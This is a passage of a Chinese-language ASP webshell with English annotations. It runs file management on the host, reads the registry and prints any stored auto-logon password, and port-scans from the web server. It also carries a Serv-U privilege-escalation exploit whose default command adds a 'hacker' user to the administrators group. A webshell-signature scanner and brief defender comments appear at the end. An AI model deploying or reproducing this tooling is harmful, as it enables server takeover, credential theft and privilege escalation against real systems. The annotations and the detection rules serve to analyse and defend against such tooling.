set t=cf.createtextfile(path)
t.writeline request.form("content")
t.close
set t=nothing
si="<center><br><br><br>文件保存成功!</center>"
si=si&backurl
rrs si
response.end
end if
if path<>"" then
set t=cf.opentextfile(path, 1, false)
txt=htmlencode(t.readall)
t.close
set t=nothing
else
path=session("folderpath")&"\newfile.asp":txt="新建文件"
end if
si=si&"<form action='"&url&"?action2=post' method='post'
name='editform'>"
si=si&"<input name='action' value='editfile' type='hidden'>"
si=si&"<input name='fname' value='"&path&"' style='width:100%'><br>"
si=si&"<textarea name='content'
style='width:100%;height:450'>"&txt&"</textarea><br>"
si=si&"<hr><input name='goback' type='button' value='返回'
onclick='history.back();'> <input name='reset'
type='reset' value='重置'> <input name='submit'
type='submit' value='保存'></form>"
rrs si
end function
function copyfile(path)
path = split(path,"||||")
if cf.fileexists(path(0)) and path(1)<>"" then
cf.copyfile path(0),path(1)
si="<center><br><br><br>文件"&path(0)&"复制成功!</center>"
si=si&backurl
rrs si
end if
end function
function movefile(path)
path = split(path,"||||")
if cf.fileexists(path(0)) and path(1)<>"" then
cf.movefile path(0),path(1)
si="<center><br><br><br>文件"&path(0)&"移动成功!</center>"
si=si&backurl
rrs si
end if
end function
function delfolder(path)
if cf.folderexists(path) then
cf.deletefolder path
si="<center><br><br><br>目录"&path&"删除成功!</center>"
si=si&backurl
rrs si
end if
end function
function copyfolder(path)
path = split(path,"||||")
if cf.folderexists(path(0)) and path(1)<>"" then
cf.copyfolder path(0),path(1)
si="<center><br><br><br>目录"&path(0)&"复制成功!</center>"
si=si&backurl
rrs si
end if
end function
function movefolder(path)
path = split(path,"||||")
if cf.folderexists(path(0)) and path(1)<>"" then
cf.movefolder path(0),path(1)
si="<center><br><br><br>目录"&path(0)&"移动成功!</center>"
si=si&backurl
rrs si
end if
end function
function newfolder(path)
if not cf.folderexists(path) and path<>"" then
cf.createfolder path
si="<center><br><br><br>目录"&path&"新建成功!</center>"
si=si&backurl
rrs si
end if
end function
end class
' Reads two groups of registry values through wscript.shell regread and
' prints them:
'   - the Remote Desktop listening port (rdp-tcp\portnumber);
'   - the Winlogon auto-logon settings: autoadminlogon, defaultusername and
'     defaultpassword.
' When auto-logon is reported as enabled, the account name and the stored
' password are written to the page.
' For defenders: a defaultpassword value under Winlogon holds the auto-logon
' password in clear text and is readable by code running on the host, so
' servers should not have it set; registry reads of this key by the web
' application's identity are worth alerting on.
' If reading the password fails, "false" is printed and the password line is
' still emitted with an empty value.
sub getterminalinfo()
on error resume next
set wsx = server.createobject("wscript.shell")
dim terminalportpath, terminalportkey, termport
dim autologinpath, autologinuserkey, autologinpasskey
dim isautologinenable, autologinenablekey, autologinusername,
autologinpassword
terminalportpath = "hklm\system\currentcontrolset\control\terminal
server\winstations\rdp-tcp\"
terminalportkey = "portnumber"
termport = wsx.regread(terminalportpath & terminalportkey)
rrs "终端服务端口及自动登录<hr/><ol>"
if termport = "" or err.number <> 0 then
rrs"无法得到终端服务端口, 请检查权限是否已经受到限制.<br/>"
else
rrs "当前终端服务端口: " & termport & "<br/>"
end if
autologinpath = "hkey_local_machine\software\microsoft\windows
nt\currentversion\winlogon\"
autologinenablekey = "autoadminlogon"
autologinuserkey = "defaultusername"
autologinpasskey = "defaultpassword"
isautologinenable = wsx.regread(autologinpath & autologinenablekey)
if isautologinenable = 0 then
rrs "系统自动登录功能未开启<br/>"
else
autologinusername = wsx.regread(autologinpath & autologinuserkey)
rrs "自动登录的系统帐户: " & autologinusername & "<br>"
autologinpassword = wsx.regread(autologinpath & autologinpasskey)
if err then
err.clear
rrs "false"
end if
rrs "自动登录的帐户密码: " & autologinpassword & "<br>"
end if
rrs "</ol>"
end sub
' Registry reader page.
' It prints a form with a "thepath" input (pre-filled with the computer-name
' value) and a hidden block of static hint lines naming other registry values
' (logon display, anonymous-access, default-share, TCP/IP filter and
' per-interface network settings). The hint block is text only; nothing in it
' is read by this sub.
' When the request carries thepath, that value is passed unchanged to
' wscript.shell regread and the result is printed: one list item per element
' for array data, a single item otherwise. Output is not HTML-encoded.
' The hidden field is named "theact", while the dispatcher elsewhere in the
' listing keys on "action".
sub readreg()
rrs "注册表键值读取:<hr/>"
rrs "<form method=post>"
rrs "<input type=hidden value=readreg name=theact>"
rrs "<input name=thepath
value='hklm\system\currentcontrolset\control\computername\computername\
computername' size=80>"
rrs " <input type=submit value=' 读取 '>"
rrs "<span id=regeditinfo style='display:none;'><hr/>"
rrs "hklm\software\microsoft\windows\currentversion\winlogon\dont-
displaylastusername,reg_sz,1 {不显示上次登录用户}<br/>"
rrs
"hklm\system\currentcontrolset\control\lsa\restrictanonymous,reg_dword,
0 {0=缺省,1=匿名用户无法列举本机用户列表,2=匿名用户无法连接本机ipc$共享
}<br/>"
rrs
"hklm\system\currentcontrolset\services\lanmanserver\parameters\autosha
reserver,reg_dword,0 {禁止默认共享}<br/>"
rrs
"hklm\system\currentcontrolset\services\lanmanserver\parameters\enables
harednetdrives,reg_sz,0 {关闭网络共享}<br/>"
rrs
"hklm\system\currentcontrolset\services\tcpip\parameters\enablesecurity
filters,reg_dword,1 {启用tcp/ip筛选(所有试配器)}<br/>"
rrs "hklm\system\controlset001
\services\tcpip\parameters\ipenablerouter,reg_dword,1 {允许ip路由}
<br/>"
rrs "-------以下似乎要看绑定的网卡,不知道是否准确---------<br/>"
rrs
"hklm\system\currentcontrolset\services\tcpip\parameters\interfaces\{8a
465128-8e99-4b0c-aff3-1348dc55eb2e}\defaultgateway,reg_muti_sz {默认网
关}<br/>"
rrs
"hklm\system\currentcontrolset\services\tcpip\parameters\interfaces\{8a
465128-8e99-4b0c-aff3-1348dc55eb2e}\nameserver {首dns}<br/>"
rrs "hklm\system\controlset001
\services\tcpip\parameters\interfaces\{8a465128-8e99-4b0c-aff3-
1348dc55eb2e}\tcpallowedports {允许的tcp/ip端口}<br/>"
rrs "hklm\system\controlset001
\services\tcpip\parameters\interfaces\{8a465128-8e99-4b0c-aff3-
1348dc55eb2e}\udpallowedports {允许的udp端口}<br/>"
rrs "-----------over--------------------<br/>"
rrs "hklm\system\controlset001\services\tcpip\enum\count {共几块活动网
卡}<br/>"
rrs "hklm\system\controlset001\services\tcpip\linkage\bind {当前网卡的
序列(把上面的替换)}<br/>"
rrs "</span>"
rrs "</form><hr/>"
if request("thepath")<>"" then
on error resume next
set wsx = server.createobject("wscript.shell")
thepath=request("thepath")
thearray=wsx.regread(thepath)
if isarray(thearray) then
for i=0 to ubound(thearray)
rrs "<li>" & thearray(i)
next
else
rrs "<li>" & thearray
end if
end if
end sub
' Port-scan page: prints a form (ip, port list) and, when the hidden "scan"
' field is posted, calls scan(ip, port) for every requested combination and
' reports the elapsed seconds.
' Input format, as parsed below:
'   ip   : comma-separated entries; an entry containing "-" is treated as a
'          range over the last octet;
'   port : comma-separated numbers or "start-end" ranges; non-numeric entries
'          are reported and skipped.
' Defaults are the port list on the first assignment below and 127.0.0.1; the
' form's ip field is pre-filled with the server's own address.
' The script timeout is raised to 7776000 seconds for this page.
' For defenders: the scan originates from the web server itself, so it shows
' up as that host opening connections to many ports on internal addresses
' within a short time, which is detectable in flow or firewall logs.
' NOTE(review): the range start is taken as a single character after the last
' dot (mid(..., 1)), so a multi-digit starting octet is truncated to its first
' digit.
sub scanport()
server.scripttimeout = 7776000
if request.form("port")="" then
portlist="21,23,25,80,110,135,139,445,1433,3389,43958"
else
portlist=request.form("port")
end if
if request.form("ip")="" then
ip="127.0.0.1"
else
ip=request.form("ip")
end if
rrs"<p>端口扫描器</p>"
rrs"<form name='form1' method='post' action=''
onsubmit='form1.submit.disabled=true;'>"
rrs"<p>scan ip: "
rrs" <input name='ip' type='text' class='textbox' id='ip'
value='"&request.servervariables("local_addr")&"' size='60'>"
rrs"<br>port list:"
rrs"<input name='port' type='text' class='textbox' size='60'
value='"&portlist&"'>"
rrs"<br><br>"
rrs"<input name='submit' type='submit' class='buttom' value=' 扫描 '>"
rrs"<input name='scan' type='hidden' id='scan' value='111'>"
rrs"</p></form>"
if request.form("scan") <> "" then
timer1 = timer
rrs("<b>扫描报告:</b><br><hr>")
tmp = split(request.form("port"),",")
ip = split(request.form("ip"),",")
for hu = 0 to ubound(ip)
if instr(ip(hu),"-") = 0 then
for i = 0 to ubound(tmp)
if isnumeric(tmp(i)) then
call scan(ip(hu), tmp(i))
else
seekx = instr(tmp(i), "-")
if seekx > 0 then
startn = left(tmp(i), seekx - 1 )
endn = right(tmp(i), len(tmp(i)) - seekx )
if isnumeric(startn) and isnumeric(endn) then
for j = startn to endn
call scan(ip(hu), j)
next
else
rrs(startn & " or " & endn & " is not number<br>")
end if
else
rrs(tmp(i) & " is not number<br>")
end if
end if
next
else
ipstart = mid(ip(hu),1,instrrev(ip(hu),"."))
for xxx = mid(ip(hu),instrrev(ip(hu),".")+1,1) to mid(ip(hu),instr(ip
(hu),"-")+1,len(ip(hu))-instr(ip(hu),"-"))
for i = 0 to ubound(tmp)
if isnumeric(tmp(i)) then
call scan(ipstart & xxx, tmp(i))
else
seekx = instr(tmp(i), "-")
if seekx > 0 then
startn = left(tmp(i), seekx - 1 )
endn = right(tmp(i), len(tmp(i)) - seekx )
if isnumeric(startn) and isnumeric(endn) then
for j = startn to endn
call scan(ipstart & xxx,j)
next
else
rrs(startn & " or " & endn & " is not number<br>")
end if
else
rrs(tmp(i) & " is not number<br>")
end if
end if
next
next
end if
next
timer2 = timer
thetime=cstr(int(timer2-timer1))
rrs"<hr>process in "&thetime&" s"
end if
end sub
' Probes one host/port pair without any socket component: it opens an ADO
' connection with the sqloledb provider to "targetip,portnum" using a
' one-second connection timeout and classifies the port from the resulting
' error. Only error numbers -2147217843 and -2147467259 are considered; a
' description containing "(connect())." is reported as closed, anything else
' as open. A connection that succeeds, or fails with another error, prints
' nothing.
' For defenders: every probe is a SQL Server login attempt with the fixed
' user id "lake2" and an empty password, so on hosts that do run SQL Server
' the scan leaves failed-login records under that name.
' The connection object is never closed or released here.
sub scan(targetip, portnum)
on error resume next
set conn = server.createobject("adodb.connection")
connstr="provider=sqloledb.1;data source=" & targetip &","&
portnum &";user id=lake2;password=;"
conn.connectiontimeout = 1
conn.open connstr
if err then
if err.number = -2147217843 or err.number = -2147467259
then
if instr(err.description, "(connect()).") > 0
then
rrs(targetip & ":" & portnum &
".........关闭<br>")
else
rrs(targetip & ":" & portnum &
".........<font color=red>开放</font><br>")
end if
end if
end if
end sub
select case action
case "mainmenu":mainmenu()
case "getterminalinfo":getterminalinfo()
case "scanport":scanport()
case "servu"
suaction=request("suaction")
if not isnumeric(suaction) then response.end
user = trim(request("u"))
pass = trim(request("p"))
port = trim(request("port"))
cmd = trim(request("c"))
f=trim(request("f"))
if f="" then
f=gpath()
else
f=left(f,2)
end if
ftpport = 65500
timeout=3
loginuser = "user " & user & vbcrlf
loginpass = "pass " & pass & vbcrlf
deldomain = "-deletedomain" & vbcrlf & "-ip=0.0.0.0" & vbcrlf & "
portno=" & ftpport & vbcrlf
mt = "site maintenance" & vbcrlf
newdomain = "-setdomain" & vbcrlf & "-domain=goldsun|0.0.0.0|" &
ftpport & "|-1|1|0" & vbcrlf & "-tzoenable=0" & vbcrlf & " tzokey=" &
vbcrlf
newuser = "-setusersetup" & vbcrlf & "-ip=0.0.0.0" & vbcrlf & "-
portno=" & ftpport & vbcrlf & "-user=go" & vbcrlf & "-password=od" &
vbcrlf & _
"-homedir=c:\\" & vbcrlf & "-loginmesfile=" & vbcrlf & "-
disable=0" & vbcrlf & "-relpaths=1" & vbcrlf & _
"-needsecure=0" & vbcrlf & "-hidehidden=0" & vbcrlf & "-
alwaysallowlogin=0" & vbcrlf & "-changepassword=0" & vbcrlf & _
"-quotaenable=0" & vbcrlf & "-maxusersloginperip=-1" & vbcrlf &
"-speedlimitup=0" & vbcrlf & "-speedlimitdown=0" & vbcrlf & _
"-maxnrusers=-1" & vbcrlf & "-idletimeout=600" & vbcrlf & "-
sessiontimeout=-1" & vbcrlf & "-expire=0" & vbcrlf & "-ratioup=1" &
vbcrlf & _
"-ratiodown=1" & vbcrlf & "-ratioscredit=0" & vbcrlf & "-
quotacurrent=0" & vbcrlf & "-quotamaximum=0" & vbcrlf & _
"-maintenance=system" & vbcrlf & "-passwordtype=regular" &
vbcrlf & "-ratios=none" & vbcrlf & " access=c:\\|rwamelcdp" & vbcrlf
quit = "quit" & vbcrlf
newuser=replace(newuser,"c:",f)
select case suaction
case 1
set a=server.createobject("microsoft.xmlhttp")
a.open "get", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",true,
"", ""
a.send loginuser & loginpass & mt & deldomain & newdomain & newuser &
quit
set session("a")=a
rrs"<form method='post' name='goldsun'>"
rrs"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
rrs"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
rrs"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
rrs"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
rrs"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
rrs"<input name='suaction' type='hidden' id='suaction'
value='2'></form>"
rrs"<script language='javascript'>"
rrs"document.write('<center>正在连接 127.0.0.1:"&port&",使用用户名:
"&user&",口令:"&pass&"...<center>');"
rrs"settimeout('document.all.goldsun.submit();',4000);"
rrs"</script>"
case 2
set b=server.createobject("microsoft.xmlhttp")
b.open "get", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2",
true, "", ""
b.send "user go" & vbcrlf & "pass od" & vbcrlf & "site exec " & cmd &
vbcrlf & quit
set session("b")=b
rrs"<form method='post' name='goldsun'>"
rrs"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
rrs"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
rrs"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
rrs"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
rrs"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
rrs"<input name='suaction' type='hidden' id='suaction'
value='3'></form>"
rrs"<script language='javascript'>"
rrs"document.write('<center>正在提升权限,请等待…………<center>');"
rrs"settimeout(""document.all.goldsun.submit();"",4000);"
rrs"</script>"
case 3
set c=server.createobject("microsoft.xmlhttp")
a.open "get", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", true,
"", ""
a.send loginuser & loginpass & mt & deldomain & quit
set session("a")=a
rrs"<center>提权完毕,已执行了命令:<br><font
color=red>"&cmd&"</font><br><br>"
rrs"<input type=button value=' 返回继续 ' onclick=""location.href='?
action=servu';"">"
rrs"</center>"
case else
on error resume next
set a=session("a")
set b=session("b")
set c=session("c")
a.abort
set a = nothing
b.abort
set b = nothing
c.abort
set c = nothing
rrs"<center><form method='post' name='goldsun'>"
rrs"<table width='494' height='163' border='1' cellpadding='0'
cellspacing='1' bordercolor='#666666'>"
rrs"<tr align='center' valign='middle'>"
rrs"<td colspan='2'>serv-u 提升权限 漫步云端修改版</td>"
rrs"</tr>"
rrs"<tr align='center' valign='middle'>"
rrs"<td width='100'>用户名:</td>"
rrs"<td width='379'><input name='u' type='text' id='u'
value='localadministrator'></td>"
rrs"</tr>"
rrs"<tr align='center' valign='middle'>"
rrs"<td>口 令:</td>"
rrs"<td><input name='p' type='text' id='p'
value='#l@$ak#.lk;0@p'></td>"
rrs"</tr>"
rrs"<tr align='center' valign='middle'>"
rrs"<td>端 口:</td>"
rrs"<td><input name='port' type='text' id='port' value='43958'></td>"
rrs"</tr>"
rrs"<tr align='center' valign='middle'>"
rrs"<td>系统路径:</td>"
rrs" <td><input name='f' type='text' id='f' value='"&f&"'
size='8'></td>"
rrs" </tr>"
rrs" <tr align='center' valign='middle'>"
rrs" <td>命 令:</td>"
rrs" <td><input name='c' type='text' id='c' value='cmd /c net user
hacker 123456 /add & net localgroup administrators hacker /add'
size='50'></td>"
rrs" </tr>"
rrs" <tr align='center' valign='middle'>"
rrs" <td colspan='2'><input type='submit' name='submit' value='提
交'> "
rrs"<input type='reset' name='submit2' value='重置'>"
rrs"<input name='suaction' type='hidden' id='action' value='1'></td>"
rrs"</tr></table></form></center>"
end select
function gpath()
' Returns a two-character, lower-cased drive prefix taken from the path of
' FileSystemObject special folder 0 (the Windows folder), e.g. "c:".
' If err.number is greater than 0 after creating the object, returns "c:".
' Analyst note: this is host reconnaissance only; it modifies nothing.
on error resume next
err.clear
set f=server.createobject("scripting.filesystemobject")
if err.number>0 then
gpath="c:"
exit function
end if
gpath=f.getspecialfolder(0)
' keep only the drive letter and colon
gpath=lcase(left(gpath,2))
set f=nothing
end function
case "kmuma"
dim report
if request.querystring("act")<>"scan" then
rrs ("<b>网站根目录</b>- "&server.mappath("/")&"<br>")
rrs ("<b>本程序目录</b>- "&server.mappath("."))
rrs "<form action=""?action=kmuma&act=scan""
method=""post"" name=""form1"">"
rrs "<p><b>填入你要检查的路径:</b>"
rrs "<input name=""path"" type=""text""
style=""border:1px solid #999"" value=""\"" size=""30"" /> 填“\”网站
根目录;“.”为本程序目录<br><br>"
rrs "你要干什么: <input class=c name=""radiobutton""
type=""radio"" value=""sws"" onclick=""document.getelementbyid
('showfile1').style.display='none'"" checked>查asp 马"
rrs "<input class=c type=""radio"" name=""radiobutton""
value=""sf"" onclick=""document.getelementbyid
('showfile1').style.display=''"">搜索符合条件之文件<br>"
rrs "<br /><div id=""showfile1""
style=""display:none"">"
rrs " 查找内容:<input
name=""search_content"" type=""text"" id=""search_content""
style=""border:1px solid #999"" size=""20"">"
rrs " 要查找的字符串,不填就只进行日期检查<br />"
rrs " 修改日期:<input name=""search_date""
type=""text"" style=""border:1px solid #999"" value="""&left(now
(),instr(now()," ")-1)&""" size=""20""> 多个日期用;隔开,任意日期填写
<a href=""#""
onclick=""javascript:form1.search_date.value='all'"">all</a><br />"
rrs " 文件类型:<input
name=""search_fileext"" type=""text"" style=""border:1px solid #999""
value=""*"" size=""20""> 类型之间用,隔开,*表示所有类型<br /><br
/></div>"
rrs "<input type=""submit"" value="" 开始扫描 ""
style=""background:#ccc;border:2px solid #fff;padding:2px 2px 0px
2px;margin:4px;"" />"
rrs "</form>"
else
if request.form("path")="" then
rrs("路径不能为空")
response.end()
end if
if request.form("path")="\" then
tmppath = server.mappath("\")
elseif request.form("path")="." then
tmppath = server.mappath(".")
else
tmppath = request.form("path")
end if
timer1 = timer
sun = 0
sumfiles = 0
sumfolders = 1
if request.form("radiobutton") = "sws" then
dimfileext = "asp,cer,asa,cdx"
call showallfile(tmppath)
else
if request.form("path") = "" or request.form
("search_date") = "" or request.form("search_fileext") = "" then
rrs("缉捕条件不完全<br><br><a
href='javascript:history.go(-1);'>请返回重新输入</a>")
response.end()
end if
dimfileext = request.form("search_fileext")
call showallfile2(tmppath)
end if
rrs "<table width=""100%"" border=""0"" cellpadding=""0""
cellspacing=""0"" style='font-size:12px'>"
rrs "<tr><th>scan webshell -- 漫步云端修改版</tr>"
rrs "<tr><td style=""padding:5px;line-height:170%;clear:both;font-
size:12px"">"
rrs "<div id=""updateinfo"" style=""background:ffffe1;border:1px solid
#89441f;padding:4px;display:none""></div>"
rrs "扫描完毕!一共检查文件夹<font
color=""#ff0000"">"&sumfolders&"</font>个,文件<font
color=""#ff0000"">"&sumfiles&"</font>个,发现可疑点<font
color=""#ff0000"">"&sun&"</font>个"
rrs "<table width=""100%"" border=""1"" cellpadding=""0""
cellspacing=""8"" bordercolor=""#999999"" style=""font-
size:12px;border-collapse:collapse;line-height:130%;clear:both;""><tr>"
if request.form("radiobutton") = "sws" then
rrs "<td width=""20%"">文件相对路径</td>"
rrs "<td width=""20%"">特征码</td>"
rrs "<td width=""40%"">描述</td>"
rrs "<td width=""20%"">创建/修改时间</td>"
else
rrs "<td width=""50%"">文件相对路径</td>"
rrs "<td width=""25%"">文件创建时间</td>"
rrs "<td width=""25%"">修改时间</td>"
end if
rrs "</tr>"
rrs report
rrs "<br/></table>"
timer2 = timer
thetime=cstr(int(((timer2-timer1)*10000 )+0.5)/10)
rrs "<br><font style='font-size:12px'>本页执行共用了"&thetime&"毫秒
</font>"
end if
sub showallfile(path)
' Recursive directory walk for the "scan for ASP shells" mode.
' For every file under path whose extension passes checkext(), calls
' scanfile() and increments the module-level counter sumfiles; for every
' sub-folder, recurses and increments sumfolders.
' Does nothing when path is not an existing folder.
' NOTE(review): temp is not assigned in this sub; whatever value it holds at
' call time is spliced into the path passed to scanfile -- verify.
set f1so = createobject("scripting.filesystemobject")
if not f1so.folderexists(path) then exit sub
set f = f1so.getfolder(path)
set fc2 = f.files
for each myfile in fc2
if checkext(f1so.getextensionname
(path&"\"&myfile.name)) then
call scanfile(path&temp&"\"&myfile.name, "")
sumfiles = sumfiles + 1
end if
next
set fc = f.subfolders
for each f1 in fc
showallfile path&"\"&f1.name
sumfolders = sumfolders + 1
next
set f1so = nothing
end sub
sub scanfile(filepath, infile)
' Heuristic scan of one file for script-shell indicators.
'   filepath - file to read.
'   infile   - when non-empty, the file that referenced filepath; shown in the
'              report row as "this file is included/executed by <infile>".
' The file is read whole and lower-cased; each matching rule appends one HTML
' table row to the module-level string report and increments the counter sun.
' Returns silently if the file cannot be opened or read.
' Analyst note: the rule strings below are split with string concatenation
' ("wscr"&domybest&"ipt.shell", "ev"&"al", ...). domybest is not assigned in
' the visible code; presumably it is empty, so the joined value is the plain
' name -- verify. Because of the splitting, the literal names never appear
' contiguously in this file, so a plain substring rule will not match this
' file itself; detection rules should account for concatenation.
server.scripttimeout=999999999
if infile <> "" then
infiles = "<font color=red>该文件被<a
href=""http://"&request.servervariables("server_name")&"/"&turlencode
(infile)&""" target=_blank>"& infile & "</a>文件包含执行</font>"
end if
set fso1s = createobject("scripting.filesystemobject")
on error resume next
set ofile = fso1s.opentextfile(filepath)
filetxt = lcase(ofile.readall())
if err then exit sub end if
if len(filetxt)>0 then
filetxt = vbcrlf & filetxt
' temp = first report column: a link to the file plus edit/delete/copy/move
' links that call the page's fullform() script function
temp = "<a href=""http://"&request.servervariables
("server_name")&"/"&turlencode(replace(replace(filepath,server.mappath
("\")&"\","",1,1,1),"\","/"))&""" target=_blank>"&replace
(filepath,server.mappath("\")&"\","",1,1,1)&"</a><br />"
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""editfile"")' class='am' title='编辑'>编辑</a> "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")&""",""delfile"")'
onclick='return yesok()' class='am' title='删除'>删除</a > "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""copyfile"")' class='am' title='复制'>复制</a> "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""movefile"")' class='am' title='移动'>移动</a>"
' Rule: command-execution COM component, by name or by CLSID
if instr( filetxt, lcase
("wscr"&domybest&"ipt.shell") ) or instr( filetxt, lcase
("clsid:72c24dd5-d70a"&domybest&"-438b-8a42-98424b88afb8") ) then
report =
report&"<tr><td>"&temp&"</td><td>wscr"&domybest&"ipt.shell 或者
clsid:72c24dd5-d70a"&domybest&"-438b-8a42-98424b88afb8</td><td><font
color=red>危险组件,一般被asp木马利用
</font>"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
sun = sun + 1
temp="-=| 同上 |=-"
end if
' Rule: shell application COM component, by name or by CLSID
if instr( filetxt, lcase
("she"&domybest&"ll.application") ) or instr( filetxt, lcase
("clsid:13709620-c27"&domybest&"9-11ce-a49e-444553540000") ) then
report =
report&"<tr><td>"&temp&"</td><td>she"&domybest&"ll.application 或者
clsid:13709620-c27"&domybest&"9-11ce-a49e-444553540000</td><td><font
color=red>危险组件,一般被asp木马利用
</font>"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
sun = sun + 1
temp="-=| 同上 |=-"
end if
' Regex rules: encoded script blocks, dynamic code evaluation, and file-write
' calls (the report text itself marks the eval hit as a possible false positive)
set regex = new regexp
regex.ignorecase = true
regex.global = true
regex.pattern = "\blanguage\s*=\s*[""]?\s*
(vbscript|jscript|javascript).encode\b"
if regex.test(filetxt) then
report =
report&"<tr><td>"&temp&"</td><td>
(vbscript|jscript|javascript).encode</td><td><font color=red>似乎脚本被
加密了</font>"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
sun = sun + 1
temp="-=| 同上 |=-"
end if
regex.pattern = "\bev"&"al\b"
if regex.test(filetxt) then
report =
report&"<tr><td>"&temp&"</td><td>ev"&"al</td><td>e"&"val()函数可以执行
任意asp代码<br>但是javascript代码中也可以使用,有可能是误
报。"&infiles&"</td><td>"&getdatecreate(filepath)&"<br>"&getdatemodify
(filepath)&"</td></tr>"
sun = sun + 1
temp="-=| 同上 |=-"
end if
regex.pattern = "[^.]\bexe"&"cute\b"
if regex.test(filetxt) then
report =
report&"<tr><td>"&temp&"</td><td>exec"&"ute</td><td><font
color=red>e"&"xecute()函数可以执行任意asp代码
</font><br>"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
sun = sun + 1
temp="-=| 同上 |=-"
end if
regex.pattern = "\.(open|create)textfile\b"
if regex.test(filetxt) then
report =
report&"<tr><td>"&temp&"</td><td>.createtextfile|.opentextfile</td><td>
使用了fso的createtextfile|opentextfile读写文
件"&infiles&"</td><td>"&getdatecreate(filepath)&"<br>"&getdatemodify
(filepath)&"</td></tr>"
sun = sun + 1
temp="-=| 同上 |=-"
end if
regex.pattern = "\.savetofile\b"
if regex.test(filetxt) then
report =
report&"<tr><td>"&temp&"</td><td>.savetofile</td><td>使用了stream的
savetofile函数写文件"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
sun = sun + 1
temp="-=| 同上 |=-"
end if
regex.pattern = "\.save\b"
if regex.test(filetxt) then
report =
report&"<tr><td>"&temp&"</td><td>.save</td><td>使用了xmlhttp的save函数
写文件"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
sun = sun + 1
temp="-=| 同上 |=-"
end if
set regex = nothing
' Follow references: #include file=, #include virtual=, and
' server.execute/transfer with a quoted argument. A referenced file is scanned
' (recursively) only when its extension does NOT pass checkext().
set regex = new regexp
regex.ignorecase = true
regex.global = true
regex.pattern = "<!--\s*#include\s*file\s*=\s*"".*"""
set matches = regex.execute(filetxt)
for each match in matches
tfile = replace(mid(match.value, instr
(match.value, """") + 1, len(match.value) - instr(match.value, """") -
1),"/","\")
if not checkext(fso1s.getextensionname(tfile))
then
call scanfile( mid(filepath,1,instrrev
(filepath,"\"))&tfile, replace(filepath,server.mappath("\")
&"\","",1,1,1) )
sumfiles = sumfiles + 1
end if
next
set matches = nothing
set regex = nothing
set regex = new regexp
regex.ignorecase = true
regex.global = true
regex.pattern = "<!--
\s*#include\s*virtual\s*=\s*"".*"""
set matches = regex.execute(filetxt)
for each match in matches
tfile = replace(mid(match.value, instr
(match.value, """") + 1, len(match.value) - instr(match.value, """") -
1),"/","\")
if not checkext(fso1s.getextensionname(tfile))
then
call scanfile( server.mappath("\")
&"\"&tfile, replace(filepath,server.mappath("\")&"\","",1,1,1) )
sumfiles = sumfiles + 1
end if
next
set matches = nothing
set regex = nothing
set regex = new regexp
regex.ignorecase = true
regex.global = true
regex.pattern = "server.(exec"&"ute|transfer)([ \t]
*|\()"".*"""
set matches = regex.execute(filetxt)
for each match in matches
tfile = replace(mid(match.value, instr
(match.value, """") + 1, len(match.value) - instr(match.value, """") -
1),"/","\")
if not checkext(fso1s.getextensionname(tfile))
then
call scanfile( mid(filepath,1,instrrev
(filepath,"\"))&tfile, replace(filepath,server.mappath("\")
&"\","",1,1,1) )
sumfiles = sumfiles + 1
end if
next
set matches = nothing
set regex = nothing
' server.execute/transfer whose argument is not a quoted literal: reported as
' "cannot trace the executed file"
set regex = new regexp
regex.ignorecase = true
regex.global = true
regex.pattern = "server.(exec"&"ute|transfer)([ \t]
*|\()[^""]\)"
if regex.test(filetxt) then
report =
report&"<tr><td>"&temp&"</td><td>server.exec"&"ute</td><td><font
color=red>不能跟踪检查server.e"&"xecute()函数执行的文件。
</font><br>"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
sun = sun + 1
end if
set matches = nothing
set regex = nothing
' <script ... runat=server ...> tags: pull out the src value (quoted or bare)
' and scan the file it names
set xregex = new regexp
xregex.ignorecase = true
xregex.global = true
xregex.pattern = "<scr"&"ipt\s*(.|\n)*?runat\s*=\s*""?
server""?(.|\n)*?>"
set xmatches = xregex.execute(filetxt)
for each match in xmatches
tmplake2 = mid(match.value, 1, instr
(match.value, ">"))
srcseek = instr(1, tmplake2, "src", 1)
if srcseek > 0 then
srcseek2 = instr(srcseek, tmplake2,
"=")
for i = 1 to 50
tmp = mid(tmplake2, srcseek2 +
i, 1)
if tmp <> " " and tmp <> chr(9)
and tmp <> vbcrlf then
exit for
end if
next
if tmp = """" then
tmpname = mid(tmplake2,
srcseek2 + i + 1, instr(srcseek2 + i + 1, tmplake2, """") - srcseek2 -
i - 1)
else
if instr(srcseek2 + i + 1,
tmplake2, " ") > 0 then tmpname = mid(tmplake2, srcseek2 + i, instr
(srcseek2 + i + 1, tmplake2, " ") - srcseek2 - i) else tmpname =
tmplake2
if instr(tmpname, chr(9)) > 0
then tmpname = mid(tmpname, 1, instr(1, tmpname, chr(9)) - 1)
if instr(tmpname, vbcrlf) > 0
